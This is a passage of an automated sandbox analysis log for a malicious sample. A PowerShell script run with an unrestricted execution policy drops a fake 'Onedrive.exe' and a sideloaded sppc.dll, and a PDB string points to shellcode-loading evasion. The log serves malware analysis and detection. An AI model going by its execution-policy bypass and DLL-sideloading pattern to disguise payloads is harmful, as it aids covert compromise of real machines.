Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A031C980	3_2_00007FF8A031C980
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A0302B00	3_2_00007FF8A0302B00
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A031BDC0	3_2_00007FF8A031BDC0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A031AD91	3_2_00007FF8A031AD91

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\sppc.dll 758BB067ECC1D7832D1B389CFA85B70376645694C60B5D017747B1E1664CB2F6

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: String function: 00007FF8A031EFC0 appears 198 times
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: String function: 00007FF8A031DE30 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: String function: 00007FF8A031DDC0 appears 57 times

Source: classification engine

Classification label: mal60.evad.winPS1@4/8@1/2

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

Code function: 3_2_00007FF6104F7B1C CoCreateInstance,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,

3_2_00007FF6104F7B1C

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

Code function: 3_2_00007FF6104F4B14 FindResourceExW,GetLastError,LoadResource,LockResource,

3_2_00007FF6104F4B14

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwlmme2b.4eo.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Onedrive.exe "C:\Users\user\AppData\Local\Temp\Onedrive.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Onedrive.exe "C:\Users\user\AppData\Local\Temp\Onedrive.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Users\dell\Downloads\tamperedsyscallshellcodeinfile\x64\Release\tampered.pdb source: Onedrive.exe, 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmp, sppc.dll.0.dr
Source:	Binary string: phoneactivate.pdb source: powershell.exe, 00000000.00000002.2268244875.0000022F7F419000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe, 00000003.00000000.2233891547.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe.0.dr
Source:	Binary string: phoneactivate.pdbGCTL source: powershell.exe, 00000000.00000002.2268244875.0000022F7F419000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe, 00000003.00000000.2233891547.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe.0.dr

Source: Onedrive.exe.0.dr

Static PE information: 0xBBFECFD3 [Thu Dec 12 01:52:19 2069 UTC]

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

Code function: 3_2_00007FF8A0301010 CreateFileA,GetFileSize,VirtualAlloc,ReadFile,CloseHandle,LoadLibraryW,GetProcAddress,VirtualFree,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,SleepEx,SleepEx,VirtualFree,CloseHandle,

3_2_00007FF8A0301010

Source: Onedrive.exe.0.dr

Static PE information: section name: .imrsiv

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_3_0000021BD8F92D0B push ds; ret	3_3_0000021BD8F92D0E
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_3_0000021BD8F98A53 push 2F672291h; retf	3_3_0000021BD8F98A92
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_3_0000021BD8F851C3 push FF00009Eh; ret	3_3_0000021BD8F851C8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\sppc.dll			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\Onedrive.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
